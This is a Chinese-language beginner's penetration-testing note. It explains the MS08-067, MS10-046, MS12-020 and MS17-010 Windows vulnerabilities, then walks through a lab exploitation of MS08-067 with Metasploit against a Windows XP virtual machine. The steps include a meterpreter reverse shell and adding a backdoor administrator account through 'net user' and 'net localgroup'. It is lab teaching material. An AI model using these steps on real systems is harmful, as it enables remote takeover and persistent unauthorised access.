這是我最早學習滲透的筆記了,現在回頭來看看就是它給我打開了這道門,操作起來還是很簡單的,建議大家在操作之前先去學習學習linux基礎和kali的用法,了解一下Metasploit滲透測試框架,說到這推薦大家一個學習網站叫實驗樓https://www.shiyanlou.com/,讓你實際操作起來更容易記住,里面不僅可以學習linux基礎還有很多免費課程可以學習學習,學習完基礎之后配置好虛擬機環境就可以做啦,下面先介紹一下這幾個漏洞的原理,原理一開始不理解沒關系,咱們先學會操作,記住這個東西,慢慢得越學越深總會理解的。
- MS08-067原理簡介
MS08-067漏洞是通過MSRPC(Microsoft Remote Procedure Call遠程進程調用)over SMB(ServerMessageBlock協議,作為一種局域網文件共享傳輸協議,常被用來作為共享文件安全傳輸研究的平台)通道調用Server服務程序中的NetPathCanonicalize函數時觸發的,而NetPathCanonicalize函數在遠程訪問其他主機時,會調用NetpwPathCanonicalize函數,對遠程訪問的路徑進行規范化,而在NetpwPathCanonicalize函數中存在的邏輯錯誤,造成棧緩沖區可被溢出,而獲得遠程代碼執行。
在路徑規范化的操作中,服務程序對路徑字符串的地址空間檢查存在邏輯漏洞。攻擊者通過精心設計輸入路徑,可以在函數去除【..\】字符串時,把路徑字符串中內容復制到路徑串之前的地址空間中(低地址),達到覆蓋函數返回地址,執行任意代碼的目的。 - MS10-046原理簡介
即Microsoft Windows快捷方式LNK文件自動執行代碼漏洞。
Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,點擊LNK文件與點擊快捷方式所制定的目標具有相同效果。Windows沒有正確的處理LNK文件,特制的LNK文件可能導致Windows自動執行快捷方式文件所指定的代碼。這些代碼可能位於USB驅動、本地或遠程文件系統、光驅或其他位置,使用資源管理器查看了LNK文件所在的位置就足以觸發這個漏洞。 - MS12-020原理簡介
MS12-020是一個針對RDP遠程桌面協議的漏洞,可能會造成遠程執行代碼,可用於作Dos攻擊。 - MS17-010原理簡介
永恆之藍漏洞是方程式組織在其漏洞利用框架中一個針對SMB服務進行攻擊的漏洞,該漏洞導致攻擊者在目標系統上可以執行任意代碼,事實上永恆之藍應用的不僅僅是一個漏洞,而是包含Windows SMB 遠程代碼執行漏洞CVE-2017-0143、CVE-2017-0144、CVE-2017-0145、CVE-2017-0146、CVE-2017-0147、CVE-2017-0148在內的6個SMB漏洞的攻擊,所以攻擊顯得十分繁瑣。
接下來咱們以MS08-067漏洞為例進行演示:
一、 實驗名稱:MS08-067漏洞攻擊
二、 實驗環境:VMware Workstation pro虛擬機、Metasploit滲透測試框架、kali-linux-2019.4(攻擊機)、WinXPenSP3(靶機)、攻擊機ip:192.168.202.128、靶機ip:192.168.202.129
三、 實驗步驟:
1. 打開linux系統終端,輸入ifconfig查看linux系統ip地址為192.168.202.128
2. 打開靶機系統Windows鍵加r輸入cmd,進入命令控制台,輸入ipconfig查看xp系統ip地址為192.168.202.129
3. 兩系統之間進行ping操作,檢查是否能通信
4. 成功通信之后,啟用msf,命令為msfconsole
5. 搜索漏洞,命令為search ms08-067(這里你想實驗哪個漏洞就輸入那個漏洞的代號)
6. 接着調用合適的漏洞,我們稱之為選擇攻擊槍,命令為:use exploit/windows/smb/ms08_067_netapi
7. 然后讓我們裝上子彈,配置攻擊信息和加載攻擊負載,這里我們可以先show options查看我們需要配置的信息,配置好之后也可以通過這個命令查看是否配置成功,這里再提一下攻擊負載,windows(靶機的操作系統)/meterpreter(或shell,選擇控制台)/reverse_tcp(或bind_tcp,選擇攻擊方法),括號里外的區別大家可以先自己操作對比一下,再去網上搜一搜具體的解釋
8. 開始漏洞利用,返回成功利用的信息,命令exploit或run都可以
9. 因為之前設置進入了meterpreter控制台,接着我們查看當前的用戶權限,輸入getuid,得到權限的級別后,進入shell,當然,不同的漏洞有不同的攻擊效果,大家自行嘗試
10. 可以看到已經進入了靶機的管理員命令控制台,給靶機添加用戶賬號,命令為net user yoyodan(用戶名) 000000(密碼) /add
11. 把剛剛創建好的用戶添加到管理員組,命令:net localgroup administrators yoyodan /add
12. 遠程登錄到靶機系統,輸入exit退出到root操作后輸入命令rdesktop 192.168.202.129,用我們之前創建好的用戶登錄,當然我們還可以進行其他的后滲透操作,或許今后會寫一篇后滲透文章,盡請期待